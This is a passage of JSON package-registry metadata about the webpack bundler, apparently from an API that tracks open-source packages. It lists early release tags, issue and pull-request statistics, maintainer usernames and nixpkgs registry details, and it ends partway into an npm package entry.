at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-30T03:20:17.570Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/nodePackages.webpack?channel=24.11\u0026repository_url=https://channels.nixos.org/nixos-24.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/nodePackages.webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/nodePackages.webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/nodePackages.webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T00:25:47.755Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/nodePackages.webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/nodePackages.webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/nodePackages.webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/nodePackages.webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/nodePackages.webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/nodePackages.webpack/codemeta","maintainers":[],"registry":{"name":"nixpkgs-24.11","url":"https://channels.nixos.org/nixos-24.11","ecosystem":"nixpkgs","default":false,"packages_count":121983,"maintainers_count":3777,"namespaces_count":0,"keywords_count":739,"github":"NixOS","metadata":{"funded_packages_count":3757},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.059Z","updated_at":"2026-09-02T05:05:10.221Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/namespaces"}},{"id":1370534,"name":"@xigua_front/webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom 